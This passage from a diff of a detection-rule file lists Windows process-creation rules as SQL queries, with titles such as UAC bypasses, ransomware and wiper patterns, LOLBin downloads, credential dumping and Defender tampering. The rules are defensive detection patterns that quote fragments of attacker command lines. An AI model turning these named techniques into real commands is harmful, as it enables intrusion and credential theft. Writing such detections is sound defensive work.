'%\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\Currentversion\\\\Winlogon%' ESCAPE '\\' OR CommandLine LIKE '%\\\\CurrentControlSet\\\\Control\\\\SecurityProviders\\\\WDigest%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Microsoft\\\\Windows Defender\\\\%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (ParentProcessName LIKE '%\\\\svchost.exe' ESCAPE '\\' AND ParentCommandLine LIKE '%-s WebClient%' ESCAPE '\\' AND NewProcessName LIKE '%\\\\rundll32.exe' ESCAPE '\\' AND CommandLine LIKE '%C:\\\\windows\\\\system32\\\\davclnt.dll,DavSetCookie%' ESCAPE '\\' AND CommandLine REGEXP '://\\d{1,3}\\.\\d{1,3}\\.\\d{1,3}\\.\\d{1,3}') AND NOT (((CommandLine LIKE '%://10.%' ESCAPE '\\' OR CommandLine LIKE '%://192.168.%' ESCAPE '\\' OR CommandLine LIKE '%://172.16.%' ESCAPE '\\' OR CommandLine LIKE '%://172.17.%' ESCAPE '\\' OR CommandLine LIKE '%://172.18.%' ESCAPE '\\' OR CommandLine LIKE '%://172.19.%' ESCAPE '\\' OR CommandLine LIKE '%://172.20.%' ESCAPE '\\' OR CommandLine LIKE '%://172.21.%' ESCAPE '\\' OR CommandLine LIKE '%://172.22.%' ESCAPE '\\' OR CommandLine LIKE '%://172.23.%' ESCAPE '\\' OR CommandLine LIKE '%://172.24.%' ESCAPE '\\' OR CommandLine LIKE '%://172.25.%' ESCAPE '\\' OR CommandLine LIKE '%://172.26.%' ESCAPE '\\' OR CommandLine LIKE '%://172.27.%' ESCAPE '\\' OR CommandLine LIKE '%://172.28.%' ESCAPE '\\' OR CommandLine LIKE '%://172.29.%' ESCAPE '\\' OR CommandLine LIKE '%://172.30.%' ESCAPE '\\' OR CommandLine LIKE '%://172.31.%' ESCAPE '\\' OR CommandLine LIKE '%://127.%' ESCAPE '\\' OR CommandLine LIKE '%://169.254.%' ESCAPE '\\'))))" ], - "filename": "proc_creation_win_reg_susp_paths.yml" + "filename": "proc_creation_win_rundll32_webdav_client_susp_execution.yml" }, { - "title": "Email Exifiltration Via Powershell", - "id": "312d0384-401c-4b8b-abdf-685ffba9a332", + "title": "SQLite Firefox Profile Data DB Access", + "id": "4833155a-4053-4c9c-a997-777fcea0baa7", "status": "experimental", - "description": "Detects email exfiltration via powershell cmdlets", - "author": "Nasreddine Bencherchali (Nextron Systems), Azure-Sentinel (idea)", + "description": "Detect usage of the \"sqlite\" binary to query databases in Firefox and other Gecko-based browsers for potential data stealing.", + "author": "frack113", "tags": [ - "attack.exfiltration" + "attack.credential_access", + "attack.t1539", + "attack.collection", + "attack.t1005" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND (NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\') AND CommandLine LIKE '%Add-PSSnapin%' ESCAPE '\\' AND CommandLine LIKE '%Get-Recipient%' ESCAPE '\\' AND CommandLine LIKE '%-ExpandProperty%' ESCAPE '\\' AND CommandLine LIKE '%EmailAddresses%' ESCAPE '\\' AND CommandLine LIKE '%SmtpAddress%' ESCAPE '\\' AND CommandLine LIKE '%-hidetableheaders%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (Product = 'SQLite' OR (NewProcessName LIKE '%\\\\sqlite.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\sqlite3.exe' ESCAPE '\\')) AND (CommandLine LIKE '%cookies.sqlite%' ESCAPE '\\' OR CommandLine LIKE '%places.sqlite%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_powershell_email_exfil.yml" + "filename": "proc_creation_win_sqlite_firefox_gecko_profile_data.yml" }, { - "title": "Imports Registry Key From an ADS", - "id": "0b80ade5-6997-4b1d-99a1-71701778ea61", - "status": "test", - "description": "Detects the import of a alternate datastream to the registry with regedit.exe.", - "author": "Oddvar Moe, Sander Wiebing, oscd.community", + "title": "Suspicious File Download via CertOC.exe", + "id": "70ad0861-d1fe-491c-a45f-fa48148a300d", + "status": "experimental", + "description": "Detects when a user downloads file by using CertOC.exe", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.t1112", - "attack.defense_evasion" + "attack.command_and_control", + "attack.t1105" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\regedit.exe' ESCAPE '\\' OR OriginalFileName = 'REGEDIT.EXE') AND ((CommandLine LIKE '% /i %' ESCAPE '\\' OR CommandLine LIKE '%.reg%' ESCAPE '\\') AND CommandLine REGEXP ':[^ \\\\]')) AND NOT ((CommandLine LIKE '% /e %' ESCAPE '\\' OR CommandLine LIKE '% /a %' ESCAPE '\\' OR CommandLine LIKE '% /c %' ESCAPE '\\' OR CommandLine LIKE '% -e %' ESCAPE '\\' OR CommandLine LIKE '% -a %' ESCAPE '\\' OR CommandLine LIKE '% -c %' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\certoc.exe' ESCAPE '\\' OR OriginalFileName = 'CertOC.exe') AND CommandLine LIKE '%-GetCACAPS%' ESCAPE '\\')" ], - "filename": "proc_creation_win_regedit_import_keys_ads.yml" + "filename": "proc_creation_win_lolbin_certoc_download.yml" }, { - "title": "Bypass UAC via CMSTP", - "id": "e66779cc-383e-4224-a3a4-267eeb585c40", + "title": "Potential BlackByte Ransomware Activity", + "id": "999e8307-a775-4d5f-addc-4855632335be", "status": "test", - "description": "Detect commandline usage of Microsoft Connection Manager Profile Installer (cmstp.exe) to install specially formatted local .INF files", - "author": "E.M. Anhaus (originally from Atomic Blue Detections, Endgame), oscd.community", - "tags": [ - "attack.privilege_escalation", - "attack.defense_evasion", - "attack.t1548.002", - "attack.t1218.003" - ], + "description": "Detects command line patterns used by BlackByte ransomware in different operations", + "author": "Florian Roth (Nextron Systems)", "falsepositives": [ - "Legitimate use of cmstp.exe utility by legitimate user" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\cmstp.exe' ESCAPE '\\' OR OriginalFileName = 'CMSTP.EXE') AND (CommandLine LIKE '%/s%' ESCAPE '\\' OR CommandLine LIKE '%-s%' ESCAPE '\\' OR CommandLine LIKE '%/au%' ESCAPE '\\' OR CommandLine LIKE '%-au%' ESCAPE '\\' OR CommandLine LIKE '%/ni%' ESCAPE '\\' OR CommandLine LIKE '%-ni%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE 'C:\\\\Users\\\\Public\\\\%' ESCAPE '\\' AND CommandLine LIKE '% -single %' ESCAPE '\\') OR (CommandLine LIKE '%del C:\\\\Windows\\\\System32\\\\Taskmgr.exe%' ESCAPE '\\' OR CommandLine LIKE '%;Set-Service -StartupType Disabled $%' ESCAPE '\\' OR CommandLine LIKE '%powershell -command \"$x =[System.Text.Encoding]::Unicode.GetString([System.Convert]::FromBase64String(%' ESCAPE '\\' OR CommandLine LIKE '% do start wordpad.exe /p %' ESCAPE '\\')))" ], - "filename": "proc_creation_win_uac_bypass_cmstp.yml" + "filename": "proc_creation_win_malware_blackbyte_ransomware.yml" }, { - "title": "Renamed NetSupport RAT Execution", - "id": "0afbd410-de03-4078-8491-f132303cb67d", - "status": "experimental", - "description": "Detects the execution of a renamed \"client32.exe\" (NetSupport RAT) via Imphash, Product and OriginalFileName strings", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "Potential SystemNightmare Exploitation Attempt", + "id": "c01f7bd6-0c1d-47aa-9c61-187b91273a16", + "status": "test", + "description": "Detects an exploitation attempt of SystemNightmare in order to obtain a shell as LOCAL_SYSTEM", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.defense_evasion" + "attack.privilege_escalation", + "attack.t1068" ], "falsepositives": [ "Unknown" ], - "level": "high", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (Product LIKE '%NetSupport Remote Control%' ESCAPE '\\' OR OriginalFileName LIKE '%client32.exe%' ESCAPE '\\' OR Imphash = 'a9d50692e95b79723f3e76fcf70d023e' OR Hashes LIKE '%IMPHASH=A9D50692E95B79723F3E76FCF70D023E%' ESCAPE '\\') AND NOT (NewProcessName LIKE '%\\\\client32.exe' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND (CommandLine LIKE '%printnightmare.gentilkiwi.com%' ESCAPE '\\' OR CommandLine LIKE '% /user:gentilguest %' ESCAPE '\\' OR CommandLine LIKE '%Kiwi Legit Printer%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_renamed_netsupport_rat.yml" + "filename": "proc_creation_win_exploit_other_systemnightmare.yml" }, { - "title": "Sensitive Registry Access via Volume Shadow Copy", - "id": "f57f8d16-1f39-4dcb-a604-6c73d9b54b3d", - "status": "experimental", - "description": "Detects a command that accesses password storing registry hives via volume shadow backups", - "author": "Max Altgelt (Nextron Systems), Tobias Michalski (Nextron Systems)", + "title": "UAC Bypass Using MSConfig Token Modification - Process", + "id": "ad92e3f9-7eb6-460e-96b1-582b0ccbb980", + "status": "test", + "description": "Detects the pattern of UAC Bypass using a msconfig GUI hack (UACMe 55)", + "author": "Christian Burkard (Nextron Systems)", "tags": [ - "attack.impact", - "attack.t1490" + "attack.defense_evasion", + "attack.privilege_escalation", + "attack.t1548.002" ], "falsepositives": [ - "Some rare backup scenarios" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '%\\\\\\\\\\?\\\\GLOBALROOT\\\\Device\\\\HarddiskVolumeShadowCopy%' ESCAPE '\\' AND (CommandLine LIKE '%\\\\NTDS.dit%' ESCAPE '\\' OR CommandLine LIKE '%\\\\SYSTEM%' ESCAPE '\\' OR CommandLine LIKE '%\\\\SECURITY%' ESCAPE '\\' OR CommandLine LIKE '%C:\\\\tmp\\\\log%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND IntegrityLevel IN ('High', 'System') AND ParentProcessName LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\pkgmgr.exe' ESCAPE '\\' AND CommandLine LIKE '\"C:\\\\Windows\\\\system32\\\\msconfig.exe\" -5' ESCAPE '\\')" ], - "filename": "proc_creation_win_malware_conti_shadowcopy.yml" + "filename": "proc_creation_win_uac_bypass_msconfig_gui.yml" }, { - "title": "Exchange PowerShell Snap-Ins Usage", - "id": "25676e10-2121-446e-80a4-71ff8506af47", - "status": "experimental", - "description": "Detects adding and using Exchange PowerShell snap-ins to export mailbox data. As seen used by HAFNIUM and APT27", - "author": "FPT.EagleEye, Nasreddine Bencherchali (Nextron Systems)", + "title": "Potential Persistence Via Netsh Helper DLL", + "id": "56321594-9087-49d9-bf10-524fe8479452", + "status": "test", + "description": "Detects the execution of netsh with \"add helper\" flag in order to add a custom helper DLL. This technique can be abused to add a malicious helper DLL that can be used as a persistence proxy that gets called when netsh.exe is executed.", + "author": "Victor Sergeev, oscd.community", "tags": [ - "attack.execution", - "attack.t1059.001", - "attack.collection", - "attack.t1114" + "attack.privilege_escalation", + "attack.persistence", + "attack.t1546.007", + "attack.s0108" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (((NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\') OR OriginalFileName IN ('PowerShell.EXE', 'pwsh.dll')) AND CommandLine LIKE '%Add-PSSnapin%' ESCAPE '\\' AND (CommandLine LIKE '%Microsoft.Exchange.Powershell.Snapin%' ESCAPE '\\' OR CommandLine LIKE '%Microsoft.Exchange.Management.PowerShell.SnapIn%' ESCAPE '\\')) AND NOT ((ParentProcessName LIKE 'C:\\\\Windows\\\\System32\\\\msiexec.exe' ESCAPE '\\' AND CommandLine LIKE '%$exserver=Get-ExchangeServer ([Environment]::MachineName) -ErrorVariable exerr 2> $null%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND NewProcessName LIKE '%\\\\netsh.exe' ESCAPE '\\' AND CommandLine LIKE '%add%' ESCAPE '\\' AND CommandLine LIKE '%helper%' ESCAPE '\\')" ], - "filename": "proc_creation_win_powershell_snapins_hafnium.yml" + "filename": "proc_creation_win_netsh_helper_dll_persistence.yml" }, { - "title": "Winword LOLBIN Usage", - "id": "4ae3e30b-b03f-43aa-87e3-b622f4048eed", - "status": "experimental", - "description": "Detects Winword process loading custmom dlls via the '/l' switch.\nWinword can be abused as a LOLBIN to download arbitrary file or load arbitrary DLLs.\n", - "author": "Nasreddine Bencherchali (Nextron Systems), Victor Sergeev, oscd.community", + "title": "UAC Bypass Tools Using ComputerDefaults", + "id": "3c05e90d-7eba-4324-9972-5d7f711a60a8", + "status": "test", + "description": "Detects tools such as UACMe used to bypass UAC with computerdefaults.exe (UACMe 59)", + "author": "Christian Burkard (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.t1202" + "attack.privilege_escalation", + "attack.t1548.002" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\WINWORD.exe' ESCAPE '\\' OR OriginalFileName = 'WinWord.exe') AND (CommandLine LIKE '%/l %' ESCAPE '\\' OR CommandLine LIKE '%.dll%' ESCAPE '\\' OR CommandLine LIKE '%http://%' ESCAPE '\\' OR CommandLine LIKE '%https://%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (IntegrityLevel IN ('High', 'System') AND NewProcessName LIKE 'C:\\\\Windows\\\\System32\\\\ComputerDefaults.exe' ESCAPE '\\') AND NOT ((ParentProcessName LIKE '%:\\\\Windows\\\\System32%' ESCAPE '\\' OR ParentProcessName LIKE '%:\\\\Program Files%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_lolbin_winword.yml" + "filename": "proc_creation_win_uac_bypass_computerdefaults.yml" }, { - "title": "Suspicious Greedy Compression Using Rar.EXE", - "id": "afe52666-401e-4a02-b4ff-5d128990b8cb", + "title": "Hermetic Wiper TG Process Patterns", + "id": "2f974656-6d83-4059-bbdf-68ac5403422f", "status": "experimental", - "description": "Detects RAR usage that creates an archive from a suspicious folder, either a system folder or one of the folders often used by attackers for staging purposes", - "author": "X__Junior, Florian Roth", + "description": "Detects process execution patterns found in intrusions related to the Hermetic Wiper malware attacks against Ukraine in February 2022", + "author": "Florian Roth (Nextron Systems)", "tags": [ "attack.execution", - "attack.t1059" + "attack.lateral_movement", + "attack.t1021.001" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\rar.exe' ESCAPE '\\' OR Description = 'Command line RAR' OR (CommandLine LIKE '%.exe a %' ESCAPE '\\' OR CommandLine LIKE '% a -m%' ESCAPE '\\')) AND (CommandLine LIKE '% -hp%' ESCAPE '\\' AND CommandLine LIKE '% -r %' ESCAPE '\\' AND (CommandLine LIKE '% C:\\\\\\*.%' ESCAPE '\\' OR CommandLine LIKE '% C:\\\\\\\\\\*.%' ESCAPE '\\' OR CommandLine LIKE '% C:\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR CommandLine LIKE '% \\%public\\%%' ESCAPE '\\' OR CommandLine LIKE '% C:\\\\Windows\\\\%' ESCAPE '\\' OR CommandLine LIKE '% C:\\\\PerfLogs\\\\%' ESCAPE '\\' OR CommandLine LIKE '% C:\\\\Temp%' ESCAPE '\\' OR CommandLine LIKE '% C:\\\\$Recycle.bin\\\\%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\policydefinitions\\\\postgresql.exe' ESCAPE '\\' OR (CommandLine LIKE '%CSIDL\\_SYSTEM\\_DRIVE\\\\temp\\\\sys.tmp%' ESCAPE '\\' OR CommandLine LIKE '% 1> \\\\\\\\127.0.0.1\\\\ADMIN$\\\\\\_\\_16%' ESCAPE '\\') OR (CommandLine LIKE '%powershell -c %' ESCAPE '\\' AND CommandLine LIKE '%\\\\comsvcs.dll MiniDump %' ESCAPE '\\' AND CommandLine LIKE '%\\\\winupd.log full%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_rar_susp_greedy_compression.yml" + "filename": "proc_creation_win_malware_hermetic_wiper_activity.yml" }, { - "title": "Suspicious Compression Tool Parameters", - "id": "27a72a60-7e5e-47b1-9d17-909c9abafdcd", - "status": "test", - "description": "Detects suspicious command line arguments of common data compression tools", - "author": "Florian Roth (Nextron Systems), Samir Bousseaden", + "title": "Suspicious DumpMinitool Execution", + "id": "eb1c4225-1c23-4241-8dd4-051389fde4ce", + "status": "experimental", + "description": "Detects suspicious ways to use the \"DumpMinitool.exe\" binary", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.collection", - "attack.t1560.001" + "attack.defense_evasion", + "attack.t1036", + "attack.t1003.001" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((OriginalFileName LIKE '7z%.exe' ESCAPE '\\' OR OriginalFileName LIKE '%rar.exe' ESCAPE '\\' OR OriginalFileName LIKE '%Command%Line%RAR%' ESCAPE '\\') AND (CommandLine LIKE '% -p%' ESCAPE '\\' OR CommandLine LIKE '% -ta%' ESCAPE '\\' OR CommandLine LIKE '% -tb%' ESCAPE '\\' OR CommandLine LIKE '% -sdel%' ESCAPE '\\' OR CommandLine LIKE '% -dw%' ESCAPE '\\' OR CommandLine LIKE '% -hp%' ESCAPE '\\')) AND NOT (ParentProcessName LIKE 'C:\\\\Program%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\DumpMinitool.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\DumpMinitool.x86.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\DumpMinitool.arm64.exe' ESCAPE '\\') OR OriginalFileName IN ('DumpMinitool.exe', 'DumpMinitool.x86.exe', 'DumpMinitool.arm64.exe')) AND ((NOT ((NewProcessName LIKE '%\\\\Microsoft Visual Studio\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Extensions\\\\%' ESCAPE '\\')) OR CommandLine LIKE '%.txt%' ESCAPE '\\') OR ((CommandLine LIKE '% Full%' ESCAPE '\\' OR CommandLine LIKE '% Mini%' ESCAPE '\\' OR CommandLine LIKE '% WithHeap%' ESCAPE '\\') AND NOT (CommandLine LIKE '%--dumpType%' ESCAPE '\\'))))" ], - "filename": "proc_creation_win_susp_compression_params.yml" + "filename": "proc_creation_win_dumpminitool_susp_execution.yml" }, { - "title": "Rundll32 Registered COM Objects", - "id": "f1edd233-30b5-4823-9e6a-c4171b24d316", + "title": "Suspicious Program Location Whitelisted In Firewall Via Netsh.EXE", + "id": "a35f5a72-f347-4e36-8895-9869b0d5fc6d", "status": "test", - "description": "load malicious registered COM objects", - "author": "frack113", + "description": "Detects Netsh command execution that whitelists a program located in a suspicious location in the Windows Firewall", + "author": "Sander Wiebing, Jonhnathan Ribeiro, Daniil Yugoslavskiy, oscd.community", "tags": [ - "attack.privilege_escalation", - "attack.persistence", - "attack.t1546.015" + "attack.defense_evasion", + "attack.t1562.004" ], "falsepositives": [ - "Legitimate use" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR OriginalFileName = 'RUNDLL32.EXE') AND ((CommandLine LIKE '%-sta %' ESCAPE '\\' OR CommandLine LIKE '%-localserver %' ESCAPE '\\') AND CommandLine LIKE '%{%' ESCAPE '\\' AND CommandLine LIKE '%}%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\netsh.exe' ESCAPE '\\' OR OriginalFileName = 'netsh.exe') AND ((CommandLine LIKE '%firewall%' ESCAPE '\\' AND CommandLine LIKE '%add%' ESCAPE '\\' AND CommandLine LIKE '%allowedprogram%' ESCAPE '\\') OR (CommandLine LIKE '%advfirewall%' ESCAPE '\\' AND CommandLine LIKE '%firewall%' ESCAPE '\\' AND CommandLine LIKE '%add%' ESCAPE '\\' AND CommandLine LIKE '%rule%' ESCAPE '\\' AND CommandLine LIKE '%action=allow%' ESCAPE '\\' AND CommandLine LIKE '%program=%' ESCAPE '\\')) AND (CommandLine LIKE '%\\%Public\\%\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\%TEMP\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\%TMP\\%%' ESCAPE '\\' OR CommandLine LIKE '%:\\\\$Recycle.bin\\\\%' ESCAPE '\\' OR CommandLine LIKE '%:\\\\RECYCLER\\\\%' ESCAPE '\\' OR CommandLine LIKE '%:\\\\SystemVolumeInformation\\\\%' ESCAPE '\\' OR CommandLine LIKE '%:\\\\Temp\\\\%' ESCAPE '\\' OR CommandLine LIKE '%:\\\\Users\\\\Default\\\\%' ESCAPE '\\' OR CommandLine LIKE '%:\\\\Users\\\\Desktop\\\\%' ESCAPE '\\' OR CommandLine LIKE '%:\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR CommandLine LIKE '%:\\\\Windows\\\\addins\\\\%' ESCAPE '\\' OR CommandLine LIKE '%:\\\\Windows\\\\cursors\\\\%' ESCAPE '\\' OR CommandLine LIKE '%:\\\\Windows\\\\debug\\\\%' ESCAPE '\\' OR CommandLine LIKE '%:\\\\Windows\\\\drivers\\\\%' ESCAPE '\\' OR CommandLine LIKE '%:\\\\Windows\\\\fonts\\\\%' ESCAPE '\\' OR CommandLine LIKE '%:\\\\Windows\\\\help\\\\%' ESCAPE '\\' OR CommandLine LIKE '%:\\\\Windows\\\\system32\\\\tasks\\\\%' ESCAPE '\\' OR CommandLine LIKE '%:\\\\Windows\\\\Tasks\\\\%' ESCAPE '\\' OR CommandLine LIKE '%:\\\\Windows\\\\Temp\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Downloads\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Local Settings\\\\Temporary Internet Files\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Temporary Internet Files\\\\Content.Outlook\\\\%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_rundll32_registered_com_objects.yml" + "filename": "proc_creation_win_netsh_fw_allow_program_in_susp_location.yml" }, { - "title": "DevInit Lolbin Download", - "id": "90d50722-0483-4065-8e35-57efaadd354d", + "title": "Suspicious Debugger Registration Cmdline", + "id": "ae215552-081e-44c7-805f-be16f975c8a2", "status": "test", - "description": "Detects a certain command line flag combination used by devinit.exe lolbin to download arbitrary MSI packages on a Windows system", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects the registration of a debugger for a program that is available in the logon screen (sticky key backdoor).", + "author": "Florian Roth (Nextron Systems), oscd.community, Jonhnathan Ribeiro", "tags": [ - "attack.execution", - "attack.defense_evasion", - "attack.t1218" + "attack.persistence", + "attack.privilege_escalation", + "attack.t1546.008" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '% -t msi-install %' ESCAPE '\\' AND CommandLine LIKE '% -i http%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '%\\\\CurrentVersion\\\\Image File Execution Options\\\\%' ESCAPE '\\' AND (CommandLine LIKE '%sethc.exe%' ESCAPE '\\' OR CommandLine LIKE '%utilman.exe%' ESCAPE '\\' OR CommandLine LIKE '%osk.exe%' ESCAPE '\\' OR CommandLine LIKE '%magnify.exe%' ESCAPE '\\' OR CommandLine LIKE '%narrator.exe%' ESCAPE '\\' OR CommandLine LIKE '%displayswitch.exe%' ESCAPE '\\' OR CommandLine LIKE '%atbroker.exe%' ESCAPE '\\' OR CommandLine LIKE '%HelpPane.exe%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_lolbin_devinit.yml" + "filename": "proc_creation_win_registry_install_reg_debugger_backdoor.yml" }, { - "title": "Process Dump via RdrLeakDiag.exe", - "id": "edadb1e5-5919-4e4c-8462-a9e643b02c4b", - "status": "test", - "description": "Detects a process memory dump performed by RdrLeakDiag.exe", - "author": "Cedric MAURUGEON", + "title": "Powershell Token Obfuscation - Process Creation", + "id": "deb9b646-a508-44ee-b7c9-d8965921c6b6", + "status": "experimental", + "description": "Detects TOKEN OBFUSCATION technique from Invoke-Obfuscation", + "author": "frack113", "tags": [ - "attack.credential_access", - "attack.t1003.001" + "attack.defense_evasion", + "attack.t1027.009" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND OriginalFileName = 'RdrLeakDiag.exe' AND CommandLine LIKE '%fullmemdmp%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (CommandLine REGEXP '\\w+`(\\w+|-|.)`[\\w+|\\s]' OR CommandLine REGEXP '\"(\\{\\d\\})+\"\\s*-f' OR CommandLine REGEXP '\\$\\{((e|n|v)*`(e|n|v)*)+:path\\}|\\$\\{((e|n|v)*`(e|n|v)*)+:((p|a|t|h)*`(p|a|t|h)*)+\\}|\\$\\{env:((p|a|t|h)*`(p|a|t|h)*)+\\}'))" ], - "filename": "proc_creation_win_rdrleakdiag_process_dumping.yml" + "filename": "proc_creation_win_powershell_token_obfuscation.yml" }, { - "title": "Change Default File Association To Executable Via Assoc", - "id": "ae6f14e6-14de-45b0-9f44-c0986f50dc89", - "status": "experimental", - "description": "Detects when a program changes the default file association of any extension to an executable.\nWhen a file is opened, the default program used to open the file (also called the file association or handler) is checked. File association selections are stored in the Windows Registry and can be edited by users, administrators, or programs that have Registry access or by administrators using the built-in assoc utility. Applications can modify the file association for a given file extension to call an arbitrary program when a file with the given extension is opened.\n", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "UAC Bypass Using DismHost", + "id": "853e74f9-9392-4935-ad3b-2e8c040dae86", + "status": "test", + "description": "Detects the pattern of UAC Bypass using DismHost DLL hijacking (UACMe 63)", + "author": "Christian Burkard (Nextron Systems)", "tags": [ - "attack.persistence", - "attack.t1546.001" + "attack.defense_evasion", + "attack.privilege_escalation", + "attack.t1548.002" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\cmd.exe' ESCAPE '\\' OR OriginalFileName = 'Cmd.Exe') AND (CommandLine LIKE '%assoc %' ESCAPE '\\' AND CommandLine LIKE '%exefile%' ESCAPE '\\')) AND NOT (CommandLine LIKE '%.exe=exefile%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND ParentProcessName LIKE '%C:\\\\Users\\\\%' ESCAPE '\\' AND ParentProcessName LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\' AND ParentProcessName LIKE '%\\\\DismHost.exe%' ESCAPE '\\' AND IntegrityLevel IN ('High', 'System'))" ], - "filename": "proc_creation_win_cmd_assoc_tamper_exe_file_association.yml" + "filename": "proc_creation_win_uac_bypass_dismhost.yml" }, { - "title": "Suspicious Windows Defender Registry Key Tampering Via Reg.EXE", - "id": "452bce90-6fb0-43cc-97a5-affc283139b3", + "title": "Regasm/Regsvcs Suspicious Execution", + "id": "cc368ed0-2411-45dc-a222-510ace303cb2", "status": "experimental", - "description": "Detects the usage of \"reg.exe\" to tamper with different Windows defender registry keys in order to disable some important features related to protection and detection", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects suspicious execution of Regasm/Regsvcs utilities", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.t1562.001" + "attack.t1218.009" ], "falsepositives": [ - "Rare legitimate use by administrators to test software (should always be investigated)" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\reg.exe' ESCAPE '\\' OR OriginalFileName = 'reg.exe') AND (CommandLine LIKE '%SOFTWARE\\\\Microsoft\\\\Windows Defender\\\\%' ESCAPE '\\' OR CommandLine LIKE '%SOFTWARE\\\\Policies\\\\Microsoft\\\\Windows Defender\\\\%' ESCAPE '\\')) AND ((CommandLine LIKE '% add %' ESCAPE '\\' AND CommandLine LIKE '% /d 0%' ESCAPE '\\' AND (CommandLine LIKE '%Real-Time Protection%' ESCAPE '\\' OR CommandLine LIKE '%TamperProtection%' ESCAPE '\\')) OR (CommandLine LIKE '% add %' ESCAPE '\\' AND CommandLine LIKE '% /d 1%' ESCAPE '\\' AND CommandLine LIKE '%Notification\\_Suppress%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((((NewProcessName LIKE 